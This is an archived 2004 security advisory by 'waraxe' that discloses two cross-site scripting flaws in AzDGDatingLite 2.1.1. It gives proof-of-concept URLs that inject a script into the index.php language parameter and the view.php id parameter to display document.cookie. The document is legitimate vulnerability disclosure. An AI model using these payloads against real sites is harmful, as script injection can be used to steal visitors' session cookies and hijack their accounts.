<<< Date Index >>>     <<< Thread Index >>>

[waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite]






{================================================================================}
{                              [waraxe-2004-SA#014]                             
 }
{================================================================================}
{                                                                               
 }
{               [ Cross-Site Scripting aka XSS in AzDGDatingLite ]              
 }
{                                                                               
 }
{================================================================================}
                                                                                
                                                
Author: Janek Vind "waraxe"
Date: 07. April 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=14


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


AzDGDatingLite:        Version 2.1.1 (probably older versions are affected too)
Writed by:             AzDG (support@xxxxxxxx)
Homepage:              http://www.azdg.com              



Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


1. Cross-Site Scripting in language variable:


http://localhost/azdlite/index.php?l=en";>&lt;script&gt;alert(document.cookie);&lt;/script&gt;



2. Cross-Site Scripting in view.php:


http://localhost/azdlite/view.php?l=&id=00001&lt;script&gt;alert(document.cookie);&lt;/script&gt;




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum members and to all bugtraq readers in Estonia! 
Tervitused!
Special greets to Stefano from UT Bee Clan!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@xxxxxxxxx
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------